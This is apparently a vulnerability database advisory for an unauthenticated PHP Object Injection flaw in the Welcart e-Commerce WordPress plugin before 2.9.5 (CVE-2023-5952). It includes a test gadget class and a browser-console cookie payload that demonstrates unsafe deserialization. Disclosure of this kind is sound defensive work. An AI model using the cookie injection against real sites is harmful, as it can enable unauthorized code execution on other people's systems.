Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7HistoryNov 10, 2023 - 12:00 a.m.
Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection
2023-11-1000:00:00
Krzysztof Zając (CERT PL)
32
welcart e-commerce
gadget chain
plugin vulnerability
web developer console
unauthenticated exploit
Description The plugin unserializes user input from cookies, which could allow unautehtniacted users to perform PHP Object Injection when a suitable gadget is present on the blog
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then execute the command below in the web developer console of the browser when on the blog as unauthenticated:
document.cookie='usces_cookie=O:4:"Evil":0:{}'
Refresh the page to see the 'Arbitrary deserialization' message displayedRelated
cvelist
cvelist
nvd
nvd
CVE-2023-5952
2023-12-04 22:15:08
wpvulndb
wpvulndb
Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection
2023-11-10 00:00:00
prion
prion
Design/Logic Flaw
2023-12-04 22:15:00
cve
cve
CVE-2023-5952
2023-12-04 22:15:08
7.6 High
AI Score
Confidence
Low
0.001 Low
EPSS
Percentile
43.4%
Related for WPEX-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7